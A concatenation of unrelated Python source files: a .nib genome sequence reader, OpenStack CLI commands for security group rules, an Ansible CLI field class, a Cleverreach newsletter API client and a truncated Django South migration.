return nuc.upper()
if mask == HARDMASK and mask_bit == 1 :
return 'N'
return nuc
headers = [] # stores headers
seqs = [] # stores sequences
# sort the coords so we can walk most efficiently through the file
queries.sort()
for start, end, strand in queries :
if start < 0 :
raise NibException('Received negative start coordinate, this may '\
'indicate a region on mitochondrial DNA that '\
'spans reference sequence start and end. This '\
'utility cannot handle these cases, aborting. '\
'Requested interval: %s (%d,%d)'%(nib_fn,start,end))
start, end = map(int,(start,end))
# end == -1 means caller wants entire sequence
if end == -1 :
end = nbases
if any([nbases < c for c in [start,end]]) :
raise NibException(('Requested slice (%(start)d,%(end)d) not compatible ' \
'with sequence of length %(nbases)d in %(nib_fn)s, aborting\n\nnibFrag '\
'style error: nib read past end of file (%(start)d %(end)d) in file: '\
'%(nib_fn)s')%{'start':start,'end':end,'nbases':nbases,'nib_fn':nib_fn})
# figure out how many bytes to read through
start_byte,rem_byte = start/2,start%2
# calculate where we need to move to in the file from the current location
# + 8 is from the 2*4 bytes header info in the .nib format
byte_offset = start_byte-nib_f.tell() + 8
nib_f.seek(byte_offset,1) # seek forward to the beginning byte from current location
seq_bytes,seq_rem_byte = int(math.ceil((end-start+rem_byte)/2.)),(end+1)%2
seq_bytes = nib_f.read(seq_bytes+seq_rem_byte)
# start translating the bytes
seq = StringIO() # we use StringIO because it is more efficient than concatenating strings
for c in seq_bytes :
c_byte = struct.unpack('=b',c)[0]
# higher nibble
c_nib = (c_byte & (15<<4))>>4
nuc = trans_nib(c_nib)
seq.write(nuc)
# lower nibble
c_nib = int(c_byte) & 15
nuc = trans_nib(c_nib)
seq.write(nuc)
# final nucleotide sequence
seq_str = seq.getvalue()
# if we're reading to the end, don't clip anything
if end != nbases :
# if the coordinate requested was not on a byte boundary, adjust
if rem_byte == 1 :
seq_str = seq_str[1:]
if seq_rem_byte == 1 :
seq_str = seq_str[:-1]
# nibFrag apparently uses zero-based indexing, clip off one base
seq_str = seq_str[:-1]
seq.close()
# adjust strand
if strand == '-' :
seq_str = reverse_complement(seq_str)
seqs.append(seq_str)
return seqs
class SeqDBException(Exception): pass
class NibDBException(Exception): pass
class SeqDB(object) :
'''Base class for different kinds of sequence databases. Does nothing,
implement subclasses. Constructor rovides _db_map and db_info class members.'''
def __init__(self) :
self._db_map = {}
self.db_info = dd(dict)
def get_seq(self,*args, **kwargs) :
raise SeqDBException('Base class SeqDB has no get_seq implementation')
class NibDB(SeqDB) :
'''Class providing an interface to a set of .nib files as created by faToNib
in Jim Kent's software suite.
Sequences are identified by the basename of the .nib file without the .nib
extension, e.g. chr1.nib is identified as chr1.
Some potentially useful information about the entries in the database is
stored in the *nib_info* dictionary.
'''
def __init__(self,nib_fns=[],nib_dirs=[]) :
'''*nib_fns* is a list of paths to specific .nib files desired for the
NibDB. *nib_dirs* is a list of paths to directories containing .nib
files such that every .nib file in the directories is added to the NibDB.
Explicitly passed files take precedence over those found in directories
when sequence names collide.
'''
SeqDB.__init__(self)
# find all *.nib files in the directories passed
if isinstance(nib_dirs,str) : # user just provided single directory
nib_dirs = [nib_dirs]
dir_nibs = []
for d in nib_dirs :
dir_nibs.extend(glob.glob(os.path.join(d,'*.nib')))
if isinstance(nib_fns,str) :
nib_fns = [nib_fns]
# for each .nib found, add to db
# if there is a collision of names, those specified in files (not dirs)
# takes precedence without warning
for fn in dir_nibs+nib_fns :
# open the nib file
nib_path,nib_fn,nib_base,nib_ext = get_file_parts(fn)
fn, nib_f = _nib_fd(fn)
self._db_map[nib_base] = nib_f
# store some info
self.db_info[nib_base]['path'] = fn
nbases = validate_nib_file(self._db_map[nib_base])
self.db_info[nib_base]['nbases'] = nbases
def __del__(self) :
'''import this
...Explicit is better than implicit...
'''
for nib_f in self._db_map.values() :
nib_f.close()
def _get_db_map(self,name) :
'''Gets appropriate file handle for the requested name, raises NibDBException
if it cannot be found'''
try :
return self._db_map[name]
except KeyError :
raise NibDBException('Sequence name %s not found in NibDB'%name)
def get_fasta(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Get the fasta record for the specified arguments, returns (header,sequence)
tuple.'''
nib_f = self._get_db_map(name)
return get_nib(nib_f,start,end,strand,mask)
def get_fasta_batch(self,recs,mask=NOMASK) :
'''Batch version of *get_fasta* method. *recs* is a list of lists/tuples
with (<chromo>,<start>,<end>,<strand>). Returns list of (header,sequence)
tuples in the same sequence as the input records.'''
# gather the records for each chromosome together
chrom_recs = dd(list)
for i,r in enumerate(recs) :
chrom_recs[r[0]].append((i,r)) # recs are (index,<tuple>)
# extract sequences
all_chrom_recs = []
for chrom, rec_list in chrom_recs.items() :
# sorted lists make sequence extraction efficient
rec_list.sort(key=lambda x: x[1][1]) # recs are (index,<tuple>)
# separate indexes from records, extract for this chromo
indexes, c_recs = zip(*rec_list)
# get_nib_batch requires list of (<start>,<end>,<strand>) tuples, remove
# chromo in first position
c_recs = [r[1:] for r in c_recs]
nib_f = self._get_db_map(chrom)
headers, seqs = get_nib_batch(nib_f,c_recs,mask)
# return the sequences to a (index,(header,sequence)) list
all_chrom_recs.extend(zip(indexes,zip(headers,seqs)))
# put the sequences back in the original order
all_chrom_recs.sort(key=lambda x: x[0]) # recs are (index,<tuple>) again
indexes, recs = zip(*all_chrom_recs)
return zip(*recs)
def get_fasta_from_bed(self,bed,mask=NOMASK) :
'''Accepts either a chipsequtil.BEDFile instance or a filename for a BED
file (used to construct a BEDFile instance) and returns the fasta
records for all records in order.'''
# determine if *bed* is a filename or a BEDFile
if isinstance(bed,str) : # filename
bed = BEDFile(bed)
# construct the records
recs = []
for rec in bed :
if rec['chrom'].lower().startswith('track') : # track line, skip
continue
recs.append((rec['chrom'],int(rec['chromStart']),int(rec['chromEnd']),rec['strand']))
return self.get_fasta_batch(recs,mask)
def get_seq(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract sequence from sequence *name*. Other arguments are passed
directly to *get_nib_seq* function.'''
nib_f = self._get_db_map(name)
return get_nib_seq(nib_f,start,end,strand,mask)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Security Group Rule action implementations"""
import argparse
import six
try:
from novaclient.v2 import security_group_rules as compute_secgroup_rules
except ImportError:
from novaclient.v1_1 import security_group_rules as compute_secgroup_rules
from openstackclient.common import exceptions
from openstackclient.common import parseractions
from openstackclient.common import utils
from openstackclient.i18n import _
from openstackclient.identity import common as identity_common
from openstackclient.network import common
from openstackclient.network import utils as network_utils
def _format_security_group_rule_show(obj):
data = network_utils.transform_compute_security_group_rule(obj)
return zip(*sorted(six.iteritems(data)))
def _format_network_port_range(rule):
# Display port range or ICMP type and code. For example:
# - ICMP type: 'type=3'
# - ICMP type and code: 'type=3:code=0'
# - ICMP code: Not supported
# - Matching port range: '443:443'
# - Different port range: '22:24'
# - Single port: '80:80'
# - No port range: ''
port_range = ''
if _is_icmp_protocol(rule.protocol):
if rule.port_range_min:
port_range += 'type=' + str(rule.port_range_min)
if rule.port_range_max:
port_range += ':code=' + str(rule.port_range_max)
elif rule.port_range_min or rule.port_range_max:
port_range_min = str(rule.port_range_min)
port_range_max = str(rule.port_range_max)
if rule.port_range_min is None:
port_range_min = port_range_max
if rule.port_range_max is None:
port_range_max = port_range_min
port_range = port_range_min + ':' + port_range_max
return port_range
def _get_columns(item):
columns = list(item.keys())
if 'tenant_id' in columns:
columns.remove('tenant_id')
columns.append('project_id')
return tuple(sorted(columns))
def _convert_to_lowercase(string):
return string.lower()
def _is_icmp_protocol(protocol):
# NOTE(rtheis): Neutron has deprecated protocol icmpv6.
# However, while the OSC CLI doesn't document the protocol,
# the code must still handle it. In addition, handle both
# protocol names and numbers.
if protocol in ['icmp', 'icmpv6', 'ipv6-icmp', '1', '58']:
return True
else:
return False
class CreateSecurityGroupRule(common.NetworkAndComputeShowOne):
"""Create a new security group rule"""
def update_parser_common(self, parser):
parser.add_argument(
'group',
metavar='<group>',
help=_("Create rule in this security group (name or ID)")
)
source_group = parser.add_mutually_exclusive_group()
source_group.add_argument(
"--src-ip",
metavar="<ip-address>",
help=_("Source IP address block (may use CIDR notation; "
"default for IPv4 rule: 0.0.0.0/0)")
)
source_group.add_argument(
"--src-group",
metavar="<group>",
help=_("Source security group (name or ID)")
)
return parser
def update_parser_network(self, parser):
parser.add_argument(
'--dst-port',
metavar='<port-range>',
action=parseractions.RangeAction,
help=_("Destination port, may be a single port or a starting and "
"ending port range: 137:139. Required for IP protocols TCP "
"and UDP. Ignored for ICMP IP protocols.")
)
parser.add_argument(
'--icmp-type',
metavar='<icmp-type>',
type=int,
help=_("ICMP type for ICMP IP protocols")
)
parser.add_argument(
'--icmp-code',
metavar='<icmp-code>',
type=int,
help=_("ICMP code for ICMP IP protocols")
)
# NOTE(rtheis): Support either protocol option name for now.
# However, consider deprecating and then removing --proto in
# a future release.
protocol_group = parser.add_mutually_exclusive_group()
protocol_group.add_argument(
'--protocol',
metavar='<protocol>',
type=_convert_to_lowercase,
help=_("IP protocol (ah, dccp, egp, esp, gre, icmp, igmp, "
"ipv6-encap, ipv6-frag, ipv6-icmp, ipv6-nonxt, "
"ipv6-opts, ipv6-route, ospf, pgm, rsvp, sctp, tcp, "
"udp, udplite, vrrp and integer representations [0-255]; "
"default: tcp)")
)
protocol_group.add_argument(
'--proto',
metavar='<proto>',
type=_convert_to_lowercase,
help=argparse.SUPPRESS
)
direction_group = parser.add_mutually_exclusive_group()
direction_group.add_argument(
'--ingress',
action='store_true',
help=_("Rule applies to incoming network traffic (default)")
)
direction_group.add_argument(
'--egress',
action='store_true',
help=_("Rule applies to outgoing network traffic")
)
parser.add_argument(
'--ethertype',
metavar='<ethertype>',
choices=['IPv4', 'IPv6'],
help=_("Ethertype of network traffic "
"(IPv4, IPv6; default: based on IP protocol)")
)
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)")
)
identity_common.add_project_domain_option_to_parser(parser)
return parser
def update_parser_compute(self, parser):
parser.add_argument(
'--dst-port',
metavar='<port-range>',
default=(0, 0),
action=parseractions.RangeAction,
help=_("Destination port, may be a single port or a starting and "
"ending port range: 137:139. Required for IP protocols TCP "
"and UDP. Ignored for ICMP IP protocols.")
)
# NOTE(rtheis): Support either protocol option name for now.
# However, consider deprecating and then removing --proto in
# a future release.
protocol_group = parser.add_mutually_exclusive_group()
protocol_group.add_argument(
'--protocol',
metavar='<protocol>',
choices=['icmp', 'tcp', 'udp'],
type=_convert_to_lowercase,
help=_("IP protocol (icmp, tcp, udp; default: tcp)")
)
protocol_group.add_argument(
'--proto',
metavar='<proto>',
choices=['icmp', 'tcp', 'udp'],
type=_convert_to_lowercase,
help=argparse.SUPPRESS
)
return parser
def _get_protocol(self, parsed_args):
protocol = 'tcp'
if parsed_args.protocol is not None:
protocol = parsed_args.protocol
if parsed_args.proto is not None:
protocol = parsed_args.proto
return protocol
def _is_ipv6_protocol(self, protocol):
# NOTE(rtheis): Neutron has deprecated protocol icmpv6.
# However, while the OSC CLI doesn't document the protocol,
# the code must still handle it. In addition, handle both
# protocol names and numbers.
if (protocol.startswith('ipv6-') or
protocol in ['icmpv6', '41', '43', '44', '58', '59', '60']):
return True
else:
return False
def take_action_network(self, client, parsed_args):
# Get the security group ID to hold the rule.
security_group_id = client.find_security_group(
parsed_args.group,
ignore_missing=False
).id
# Build the create attributes.
attrs = {}
attrs['protocol'] = self._get_protocol(parsed_args)
# NOTE(rtheis): A direction must be specified and ingress
# is the default.
if parsed_args.ingress or not parsed_args.egress:
attrs['direction'] = 'ingress'
if parsed_args.egress:
attrs['direction'] = 'egress'
# NOTE(rtheis): Use ethertype specified else default based
# on IP protocol.
if parsed_args.ethertype:
attrs['ethertype'] = parsed_args.ethertype
elif self._is_ipv6_protocol(attrs['protocol']):
attrs['ethertype'] = 'IPv6'
else:
attrs['ethertype'] = 'IPv4'
# NOTE(rtheis): Validate the port range and ICMP type and code.
# It would be ideal if argparse could do this.
if parsed_args.dst_port and (parsed_args.icmp_type or
parsed_args.icmp_code):
msg = _('Argument --dst-port not allowed with arguments '
'--icmp-type and --icmp-code')
raise exceptions.CommandError(msg)
if parsed_args.icmp_type is None and parsed_args.icmp_code is not None:
msg = _('Argument --icmp-type required with argument --icmp-code')
raise exceptions.CommandError(msg)
is_icmp_protocol = _is_icmp_protocol(attrs['protocol'])
if not is_icmp_protocol and (parsed_args.icmp_type or
parsed_args.icmp_code):
msg = _('ICMP IP protocol required with arguments '
'--icmp-type and --icmp-code')
raise exceptions.CommandError(msg)
# NOTE(rtheis): For backwards compatibility, continue ignoring
# the destination port range when an ICMP IP protocol is specified.
if parsed_args.dst_port and not is_icmp_protocol:
attrs['port_range_min'] = parsed_args.dst_port[0]
attrs['port_range_max'] = parsed_args.dst_port[1]
if parsed_args.icmp_type:
attrs['port_range_min'] = parsed_args.icmp_type
if parsed_args.icmp_code:
attrs['port_range_max'] = parsed_args.icmp_code
if parsed_args.src_group is not None:
attrs['remote_group_id'] = client.find_security_group(
parsed_args.src_group,
ignore_missing=False
).id
elif parsed_args.src_ip is not None:
attrs['remote_ip_prefix'] = parsed_args.src_ip
elif attrs['ethertype'] == 'IPv4':
attrs['remote_ip_prefix'] = '0.0.0.0/0'
attrs['security_group_id'] = security_group_id
if parsed_args.project is not None:
identity_client = self.app.client_manager.identity
project_id = identity_common.find_project(
identity_client,
parsed_args.project,
parsed_args.project_domain,
).id
attrs['tenant_id'] = project_id
# Create and show the security group rule.
obj = client.create_security_group_rule(**attrs)
columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (columns, data)
def take_action_compute(self, client, parsed_args):
group = utils.find_resource(
client.security_groups,
parsed_args.group,
)
protocol = self._get_protocol(parsed_args)
if protocol == 'icmp':
from_port, to_port = -1, -1
else:
from_port, to_port = parsed_args.dst_port
src_ip = None
if parsed_args.src_group is not None:
parsed_args.src_group = utils.find_resource(
client.security_groups,
parsed_args.src_group,
).id
if parsed_args.src_ip is not None:
src_ip = parsed_args.src_ip
else:
src_ip = '0.0.0.0/0'
obj = client.security_group_rules.create(
group.id,
protocol,
from_port,
to_port,
src_ip,
parsed_args.src_group,
)
return _format_security_group_rule_show(obj._info)
class DeleteSecurityGroupRule(common.NetworkAndComputeCommand):
"""Delete a security group rule"""
def update_parser_common(self, parser):
parser.add_argument(
'rule',
metavar='<rule>',
help=_("Security group rule to delete (ID only)")
)
return parser
def take_action_network(self, client, parsed_args):
obj = client.find_security_group_rule(parsed_args.rule)
client.delete_security_group_rule(obj)
def take_action_compute(self, client, parsed_args):
client.security_group_rules.delete(parsed_args.rule)
class ListSecurityGroupRule(common.NetworkAndComputeLister):
"""List security group rules"""
def update_parser_common(self, parser):
parser.add_argument(
'group',
metavar='<group>',
nargs='?',
help=_("List all rules in this security group (name or ID)")
)
return parser
def update_parser_network(self, parser):
# Accept but hide the argument for consistency with compute.
# Network will always return all projects for an admin.
parser.add_argument(
'--all-projects',
action='store_true',
default=False,
help=argparse.SUPPRESS
)
parser.add_argument(
'--long',
action='store_true',
default=False,
help=_("List additional fields in output")
)
return parser
def update_parser_compute(self, parser):
parser.add_argument(
'--all-projects',
action='store_true',
default=False,
help=_("Display information from all projects (admin only)")
)
# Accept but hide the argument for consistency with network.
# There are no additional fields to display at this time.
parser.add_argument(
'--long',
action='store_false',
default=False,
help=argparse.SUPPRESS
)
return parser
def _get_column_headers(self, parsed_args):
column_headers = (
'ID',
'IP Protocol',
'IP Range',
'Port Range',
)
if parsed_args.long:
column_headers = column_headers + ('Direction', 'Ethertype',)
column_headers = column_headers + ('Remote Security Group',)
if parsed_args.group is None:
column_headers = column_headers + ('Security Group',)
return column_headers
def take_action_network(self, client, parsed_args):
column_headers = self._get_column_headers(parsed_args)
columns = (
'id',
'protocol',
'remote_ip_prefix',
'port_range_min',
)
if parsed_args.long:
columns = columns + ('direction', 'ethertype',)
columns = columns + ('remote_group_id',)
# Get the security group rules using the requested query.
query = {}
if parsed_args.group is not None:
# NOTE(rtheis): Unfortunately, the security group resource
# does not contain security group rules resources. So use
# the security group ID in a query to get the resources.
security_group_id = client.find_security_group(
parsed_args.group,
ignore_missing=False
).id
query = {'security_group_id': security_group_id}
else:
columns = columns + ('security_group_id',)
rules = list(client.security_group_rules(**query))
# Reformat the rules to display a port range instead
# of just the port range minimum. This maintains
# output compatibility with compute.
for rule in rules:
rule.port_range_min = _format_network_port_range(rule)
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in rules))
def take_action_compute(self, client, parsed_args):
column_headers = self._get_column_headers(parsed_args)
columns = (
"ID",
"IP Protocol",
"IP Range",
"Port Range",
"Remote Security Group",
)
rules_to_list = []
if parsed_args.group is not None:
group = utils.find_resource(
client.security_groups,
parsed_args.group,
)
rules_to_list = group.rules
else:
columns = columns + ('parent_group_id',)
search = {'all_tenants': parsed_args.all_projects}
for group in client.security_groups.list(search_opts=search):
rules_to_list.extend(group.rules)
# NOTE(rtheis): Turn the raw rules into resources.
rules = []
for rule in rules_to_list:
rules.append(compute_secgroup_rules.SecurityGroupRule(
client.security_group_rules,
network_utils.transform_compute_security_group_rule(rule),
))
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in rules))
class ShowSecurityGroupRule(common.NetworkAndComputeShowOne):
"""Display security group rule details"""
def update_parser_common(self, parser):
parser.add_argument(
'rule',
metavar="<rule>",
help=_("Security group rule to display (ID only)")
)
return parser
def take_action_network(self, client, parsed_args):
obj = client.find_security_group_rule(parsed_args.rule,
ignore_missing=False)
columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (columns, data)
def take_action_compute(self, client, parsed_args):
# NOTE(rtheis): Unfortunately, compute does not have an API
# to get or list security group rules so parse through the
# security groups to find all accessible rules in search of
# the requested rule.
obj = None
security_group_rules = []
for security_group in client.security_groups.list():
security_group_rules.extend(security_group.rules)
for security_group_rule in security_group_rules:
if parsed_args.rule == str(security_group_rule.get('id')):
obj = security_group_rule
break
if obj is None:
msg = _("Could not find security group rule with ID ") + \
parsed_args.rule
raise exceptions.CommandError(msg)
# NOTE(rtheis): Format security group rule
return _format_security_group_rule_show(obj)
|
# Copyright 2015, Ansible, Inc.
# Luke Sneeringer <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
_field_counter = 0
class Field(object):
"""A class representing flags on a given field on a model.
This class tracks whether a field is unique, filterable, read-only, etc.
"""
def __init__(self, key=None, type=six.text_type, default=None,
display=True, filterable=True, help_text=None,
is_option=True, password=False, read_only=False,
required=True, show_default=False, unique=False,
multiple=False):
# Init the name to blank.
# What's going on here: This is set by the ResourceMeta metaclass
# when the **resource** is instantiated.
# Essentially, in any normal situation, it's safe to expect it
# to be set and non-empty.
self.name = ''
# Save properties of this field.
self.key = key
self.type = type
self.display = display
self.default = default
self.help_text = help_text
self.is_option = is_option
self.filterable = filterable
self.password = password
self.read_only = read_only
self.required = required
self.show_default = show_default
self.unique = unique
self.multiple = multiple
self.no_lookup = False
# If this is a password, display is always off.
if self.password:
self.display = False
# Track the creation history of each field, for sorting reasons.
global _field_counter
self.number = _field_counter
_field_counter += 1
def __lt__(self, other):
return self.number < other.number
def __gt__(self, other):
return self.number > other.number
def __repr__(self):
return '<Field: %s (%s)>' % (self.name, ', '.join(self.flags))
@property
def flags(self):
try:
flags_list = [self.type.__name__.replace('unicode', 'str')]
except AttributeError:
flags_list = [type(self.type).__name__.replace('unicode', 'str')]
if self.read_only:
flags_list.append('read-only')
if self.unique:
flags_list.append('unique')
if not self.filterable:
flags_list.append('not filterable')
if not self.required:
flags_list.append('not required')
return flags_list
@property
def help(self):
"""Return the help text that was passed to the constructor, or a
sensible default if none was provided.
"""
if self.help_text:
return self.help_text
return 'The %s field.' % self.name
@property
def option(self):
"""Return the field name as a bash option string
(e.g. "--field-name").
"""
return '--' + self.name.replace('_', '-')
|
# coding: utf-8
"""
You have to define a group (in the cleverreach admin panel) for each language.
The form code is optional, we use the first form if it is not provided.
The Cleverreach API requires suds: https://fedorahosted.org/suds/
You have to define the following parameters in your settings.py:
CLEVERREACH = {'api_key': '<API KEY>',}
API documentation is at http://api.cleverreach.com/soap/doc/5.0/
"""
import logging
from django.conf import settings
from suds.client import Client as SudsClient
from suds import WebFault
from cleverreach import CleverreachAPIException
logger = logging.getLogger('cleverreach.api')
URL = 'http://api.cleverreach.com/soap/interface_v5.1.php?wsdl'
API_KEY = settings.CLEVERREACH.get('api_key')
class Client(object):
def __init__(self):
self.soap = SudsClient(URL) #immediately opens up a connection.
self.raise_exceptions = settings.CLEVERREACH.get('raise_exceptions', True)
# TODO: dotted path helper
def query_data(self, method, *args, **kwargs):
try:
response = getattr(self.soap.service, method)(API_KEY, *args, **kwargs)
except WebFault as e:
if self.raise_exceptions:
raise e
else:
logger.error(e)
return response.data
else:
if response.status == "ERROR":
if self.raise_exceptions:
message = u'Error for method %s: %s. Data: %s' % \
(method, response.message, response.data)
raise CleverreachAPIException(message, response.statuscode)
else:
logger.error(response.message)
return response.data
# Client
# Group
def group_get_list(self):
"""
Returns a list of group classes of the form::
(group){
id = 108907
name = "test1"
last_mailing = 1335887342
last_changed = 1335886187
count = 84
inactive_count = 0
total_count = 84
}
The dict keys are actually object properties.
"""
return self.query_data('groupGetList')
def group_clear(self, list_id):
"""
truncates the contents of a the Group
Warning: This may have heavy impact on statistics and campaigns
since every related data (receivers, orders, events) will removed.
"""
return self.query_data('groupClear', list_id)
# Forms
def forms_get_list(self, list_id):
"""
Returns a list of available forms for the given group.
Forms are object with the properties [id, name, description]
"""
return self.query_data('formsGetList', list_id)
def forms_get_code(self, form_id):
"""
Returns the HTML code for the given embedded form.
form_id -- the id of the form (not the list!)
"""
return self.query_data('formsGetCode', form_id)
def forms_activation_mail(self, form_id, email, doidata=None):
"""
Will send the activation mail to the given email.
You will have to manualy add the receiver first with "receiver.add"
or use an existing one.
If the user allready is activated, status will return an error.
"""
if not doidata:
doidata = {'user_ip': '127.0.0.1', 'user_agent': 'mozilla',
'referer': 'http://www.gotham.com/newsletter_subscribe/',
'postdata': 'firtsname:bruce,lastname:whayne,nickname:Batman',
'info': 'Extra info. the more you provide, the better.'}
return self.query_data('formsSendActivationMail', form_id, email, doidata)
# Mailing
# Receiver
def receiver_add(self, list_id, receiver):
"""
Adds a new single receiver
This function tries to add a single receiver.
If the receiver allready exists, the operation will Fail.
Use receiver_update in that case.
The default form only accepts email, registered, activated,
source and attributes.
To add more fields you have to add them as attributes. Make sure the keys
are the same as the name of the fields in the form. (Check with get_by_email)
Attribute keys may only contain lowercase a-z and 0-9.
"""
return self.query_data('receiverAdd', list_id, receiver)
def receiver_get_by_email(self, list_id, email, level=1):
"""
Gets userdetails based on given readout level.
Possible levels (bit whise)::
000 (0) > Basic readout with (de)activation dates
001 (1) > including attributes (if available)
010 (2) > including Events (if available)
100 (4) > including Orders (if available)
"""
return self.query_data('receiverGetByEmail', list_id, email, level)
def receiver_set_active(self, list_id, email):
"""
Deactivates a given receiver/email
The receiver wont receive anymore mailings from the system.
This sets/overwrites the deactivation date with the current date.
"""
return self.query_data('receiverSetActive', list_id, email)
def receiver_set_inactive(self, list_id, email):
"""
Deactivates a given receiver/email
The receiver wont receive anymore mailings from the system.
This sets/overwrites the deactivation date with the current date.
"""
return self.query_data('receiverSetInactive', list_id, email)
def receiver_delete(self, list_id, email):
""" Deletes an email out of an group. """
return self.query_data('receiverDelete', list_id, email)
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Issue.is_public_suggestion'
db.delete_column(u'core_issue', 'is_public_suggestion')
# Adding field 'Issue.is_sponsored'
db.add_column(u'core_issue', 'is_sponsored',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Adding field 'Issue.is_public_suggestion'
db.add_column(u'core_issue', 'is_public_suggestion',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Deleting field 'Issue.is_sponsored'
db.delete_column(u'core_issue', 'is_sponsored')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'bitcoin_frespo.moneysent': {
'Meta': {'object_name': 'MoneySent'},
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'from_address': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'to_address': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'transaction_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'value': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'})
},
u'bitcoin_frespo.receiveaddress': {
'Meta': {'object_name': 'ReceiveAddress'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'available': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.actionlog': {
'Meta': {'object_name': 'ActionLog'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'entity': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']", 'null': 'True'}),
'issue_comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.IssueComment']", 'null': 'True'}),
'new_json': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Offer']", 'null': 'True'}),
'old_json': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Payment']", 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Project']", 'null': 'True'}),
'solution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Solution']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
u'core.issue': {
'Meta': {'object_name': 'Issue'},
'createdByUser': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_feedback': ('django.db.models.fields.BooleanField', [], {}),
